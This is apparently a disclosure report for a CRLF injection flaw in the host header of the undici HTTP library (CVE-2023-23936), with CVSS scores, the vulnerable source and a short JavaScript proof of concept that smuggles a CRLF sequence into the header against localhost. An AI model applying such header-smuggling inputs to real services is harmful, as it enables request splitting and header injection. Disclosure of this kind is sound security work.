5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
29.3%
Summary:
undici library should be protects HTTP headers from CRLF injection vulnerabilities. However, CRLF injection exists in the ‘host’ header of undici.request api.
Description:
like https://hackerone.com/reports/1664019
Source code:
lib/core/request.js:296
function processHeader (request, key, val) {
if (val && (typeof val === 'object' && !Array.isArray(val))) {
throw new InvalidArgumentError(`invalid ${key} header`)
} else if (val === undefined) {
return
}
if (
request.host === null &&
key.length === 4 &&
key.toLowerCase() === 'host'
) {
// Consumed by Client
request.host = val // without headerCharRegex.exec(val)
} else if (
request.contentLength === null &&
...
Example:
import { request } from 'undici'
const unsanitizedContentTypeInput = '12 \r\n\r\naaa:aaa'
const {
statusCode,
headers,
trailers,
body
} = await request('http://127.0.0.1:23333', {
method: 'GET',
headers: {
'content-type': 'application/json',
'host': unsanitizedContentTypeInput
}
})
console.log('response received', statusCode)
console.log('headers', headers)
for await (const data of body) {
console.log('data', data)
}
console.log('trailers', trailers)
{F2182450}
I have submitted the report: https://hackerone.com/reports/1820955
Security Releases: https://nodejs.org/en/blog/vulnerability/february-2023-security-releases/#fetch-api-in-node-js-did-not-protect-against-crlf-injection-in-host-headers-medium-cve-2023-23936
Security Advisory: https://github.com/nodejs/undici/security/advisories/GHSA-5r9g-qh6m-jxff
All versions of the 19.x, 18.x and 16.x release lines.
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
29.3%